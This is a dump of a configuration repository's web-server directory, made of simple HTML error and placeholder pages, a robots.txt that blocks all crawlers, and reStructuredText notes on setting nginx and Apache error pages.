11 | 12 | 13 | -------------------------------------------------------------------------------- /www/htdocs/50x.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Server Temporarily Unavailable 5 | 6 | 7 |

Server Temporarily Unavailable

8 |

9 | The page you are looking for is temporarily unavailable. 10 | Please try again later. 11 |

12 | 13 | 14 | -------------------------------------------------------------------------------- /www/htdocs/down.html: -------------------------------------------------------------------------------- 1 | 2 | 20 | 21 | 22 | It does NOT work! 23 | 24 | 25 | 26 |

This website is down

27 |

28 | Some nasty technical issues occurred and the website has been temporarily 29 | shut down for safety reasons. Please come back later. 30 |

31 | 32 | 33 | -------------------------------------------------------------------------------- /www/htdocs/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fishilico/generic-config/2593f3f7d5f0a891e278d773c0cd3b2120b656f0/www/htdocs/favicon.ico -------------------------------------------------------------------------------- /www/htdocs/index-nothing.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Nothing interesting here 5 | 6 | 7 | 8 |

Nothing interesting here

9 |

10 | This host doesn't publish anything on HTTP. 11 | Please go somewhere else. 12 |

13 | 14 | 15 | -------------------------------------------------------------------------------- /www/htdocs/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: / 3 | -------------------------------------------------------------------------------- /www/index.rst: -------------------------------------------------------------------------------- 1 | WWW server files (``/var/www``) 2 | =============================== 3 | 4 | .. toctree:: 5 | :maxdepth: 1 6 | :glob: 7 | 8 | ** 9 | 10 | This directory contains basic files which are on every web server which are not 11 | really public. This means that the first function of the web server which 12 | serves these files is not to be a cool website but something else, like 13 | monitoring, statistics, file sharing... 14 | 15 | Web server configuration 16 | ------------------------ 17 | 18 | If you're using nginx, put these lines into your default vhost:: 19 | 20 | root /path/to/www/htdocs; 21 | error_page 403 /403.html; 22 | error_page 404 /404.html; 23 | error_page 500 /500.html; 24 | error_page 500 502 503 504 /50x.html; 25 | index index.html 26 | try_files $uri $uri/ =404; 27 | 28 | With Apache, use:: 29 | 30 | DocumentRoot "/path/to/www/htdocs" 31 | ErrorDocument 403 "/403.html" 32 | ErrorDocument 404 "/404.html"/i 33 | ErrorDocument 500 "/500.html" 34 | ErrorDocument 502 "/50x.html" 35 | ErrorDocument 503 "/50x.html" 36 | ErrorDocument 504 "/50x.html" 37 | --------------------------------------------------------------------------------